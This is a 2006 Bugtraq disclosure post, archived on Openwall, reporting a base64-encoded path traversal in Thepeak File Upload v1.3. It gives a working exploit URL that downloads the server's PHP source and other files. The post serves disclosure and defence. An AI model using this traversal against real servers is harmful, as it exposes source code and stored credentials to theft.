lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061026012319.11900.qmail@securityfocus.com>
Date: 26 Oct 2006 01:23:19 -0000
From: loveha@...il.com
To: bugtraq@...urityfocus.com
Subject: Thepeak File Upload v1.3 : Read file vulneability

Thepeak File Upload v1.3 : Read file vulneability
Discovered By: Ph&#7841;m &#272;&#7913;c H&#7843;i (Pham Duc Hai)
Email: duchaikhtn (at) gmail (dot) com
YIM : kiki_coco1985vn
Website: http://blog.ajaxviet.com
-------------------------
Description:
file upload manager 1.3
written by thepeak (adam medici)
copyright (c) 2003 thepeak of mtnpeak.net
A simple, powerful tool to upload and manage files using your web browser.

There are some bugs in Thepeak File Upload v1.3 :
http://www.securityfocus.com/archive/1/378494
Today, I find out a bug in Thepeak File Upload v1.3 , this bug allows attacker
can download source file(.php,...) from server.
-------------------------
Exploit :
http://somesite.com/example/index.php --> upload form
Now, we upload one file to server, ex : test.jpg -->ok
We have its url to view it : http://somesite.com/example/index.php?act=view&file=dGVzdC5qcGc=
anh url to download it : http://somesite.com/example/index.php?act=dl&file=dGVzdC5qcGc=
Notice that the value "dGVzdC5qcGc=" of parameter file is encoded 64 of " test.jpg"
We need get source file http://somesite.com/index.php.
Encode 64 path to index.php above : ../index.php --> Li4vaW5kZXgucGhw
==> we have the link to download source file index.php (notice act=dl)

http://somesite.com/example/index.php?act=dl&file=Li4vaW5kZXgucGhw

You can also download other files.
Have fun!

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ